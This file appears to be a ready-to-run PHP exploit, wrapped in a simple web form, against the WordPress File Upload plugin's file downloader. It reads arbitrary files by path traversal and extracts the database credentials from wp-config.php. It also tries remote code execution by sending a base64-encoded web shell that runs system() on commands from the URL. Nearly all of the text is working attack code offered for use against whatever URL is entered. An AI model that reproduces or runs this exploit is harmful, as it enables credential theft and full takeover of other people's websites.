README.md
Rendering markdown...
<?php
// exploit.php - by chirag artani, use xampp to run code
header('Content-Type: text/html; charset=utf-8');
class WFUExploit {
private $plugin_url;
private $wordpress_url;
private $output = '';
public function __construct($wordpress_url) {
$this->wordpress_url = rtrim($wordpress_url, '/');
$this->plugin_url = $this->wordpress_url . '/wp-content/plugins/wp-file-upload/wfu_file_downloader.php';
}
private function log($message) {
$this->output .= $message . "\n";
}
public function getOutput() {
return $this->output;
}
private function createPayload($target_file, $abspath) {
return json_encode([
'type' => 'normal',
'ticket' => 'ABC123',
'filepath' => $target_file,
'handler' => '',
'expire' => time() + 3600,
'wfu_ABSPATH' => $abspath,
'wfu_browser_downloadfile_notexist' => 'File not found',
'wfu_browser_downloadfile_failed' => 'Download failed'
], JSON_UNESCAPED_SLASHES);
}
private function extractContent($response) {
if (strpos($response, "\r\n\r\n") !== false) {
list($headers, $body) = explode("\r\n\r\n", $response, 2);
return $body;
}
return $response;
}
private function parseWPConfig($content) {
$config = [];
$patterns = [
'DB_NAME' => "/define\(\s*'DB_NAME',\s*'([^']+)'\s*\)/",
'DB_USER' => "/define\(\s*'DB_USER',\s*'([^']+)'\s*\)/",
'DB_PASSWORD' => "/define\(\s*'DB_PASSWORD',\s*'([^']+)'\s*\)/",
'DB_HOST' => "/define\(\s*'DB_HOST',\s*'([^']+)'\s*\)/",
'TABLE_PREFIX' => "/\\\$table_prefix\s*=\s*'([^']+)'/"
];
foreach ($patterns as $key => $pattern) {
preg_match($pattern, $content, $matches);
$config[$key] = isset($matches[1]) ? $matches[1] : 'Not found';
}
return $config;
}
public function exploit($target_file) {
$this->log("[*] Target: {$this->wordpress_url}");
$this->log("[*] Attempting to read: $target_file");
$wordpress_paths = [
'C:/xampp/htdocs/wordpress/',
'C:/xampp/htdocs/',
'/var/www/html/wordpress/',
'/var/www/html/',
'../../../../',
'../../../',
'../../',
'../',
'./'
];
foreach ($wordpress_paths as $wp_path) {
$this->log("[*] Testing path: $wp_path");
$temp_dir = sys_get_temp_dir();
$json_file = tempnam($temp_dir, 'wfu_');
$payload = $this->createPayload($target_file, $wp_path);
file_put_contents($json_file, $payload);
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $this->plugin_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => ['source' => basename($json_file)],
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HEADER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_TIMEOUT => 10
]);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
@unlink($json_file);
if ($http_code == 200 && !empty($response)) {
$content = $this->extractContent($response);
if (strpos($target_file, "wp-config.php") !== false && strpos($content, "DB_NAME") !== false) {
$this->log("\n[+] WordPress Configuration Found!");
$config = $this->parseWPConfig($content);
foreach ($config as $key => $value) {
$this->log(sprintf("%-15s: %s", $key, $value));
}
return true;
}
elseif (strpos($target_file, "php://") === 0 || strpos($target_file, "data://") === 0) {
if (strpos($response, 'Failed to open stream') === false) {
$this->log("\n[+] RCE Upload Successful!");
$this->log("[*] Try accessing: {$this->wordpress_url}/shell.php?cmd=whoami");
return true;
}
}
}
}
return false;
}
}
// HTML Interface
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['wordpress_url'])) {
$wordpress_url = filter_var($_POST['wordpress_url'], FILTER_SANITIZE_URL);
if (!filter_var($wordpress_url, FILTER_VALIDATE_URL)) {
$error = "Invalid URL format";
} else {
$exploit = new WFUExploit($wordpress_url);
ob_start();
// Try reading wp-config.php
$exploit->exploit("wp-config.php");
// Try RCE
$php_shell = '<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } else { echo "Shell ready"; } ?>';
$encoded_shell = base64_encode($php_shell);
$exploit->exploit("data://text/plain;base64," . $encoded_shell);
$result = $exploit->getOutput();
ob_end_clean();
}
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>WFU Security Testing Tool</title>
<style>
body {
font-family: monospace;
max-width: 900px;
margin: 20px auto;
padding: 20px;
background: #f5f5f5;
}
.container {
background: white;
padding: 20px;
border-radius: 5px;
box-shadow: 0 2px 5px rgba(0,0,0,0.1);
}
h1 {
color: #333;
border-bottom: 2px solid #eee;
padding-bottom: 10px;
}
.form-group {
margin-bottom: 15px;
}
input[type="text"] {
width: 100%;
padding: 8px;
font-family: monospace;
}
input[type="submit"] {
background: #4CAF50;
color: white;
padding: 10px 20px;
border: none;
border-radius: 3px;
cursor: pointer;
}
.output {
background: #333;
color: #fff;
padding: 15px;
border-radius: 3px;
white-space: pre-wrap;
margin-top: 20px;
}
.error {
color: red;
margin-bottom: 10px;
}
</style>
</head>
<body>
<div class="container">
<h1>WordPress File Upload Security Testing Tool</h1>
<form method="POST" action="">
<div class="form-group">
<label for="wordpress_url">WordPress URL:</label><br>
<input type="text" id="wordpress_url" name="wordpress_url"
placeholder="https://example.com/wordpress"
required>
</div>
<?php if (isset($error)): ?>
<div class="error"><?php echo htmlspecialchars($error); ?></div>
<?php endif; ?>
<input type="submit" value="Test URL">
</form>
<?php if (isset($result)): ?>
<div class="output"><?php echo htmlspecialchars($result); ?></div>
<?php endif; ?>
</div>
</body>
</html>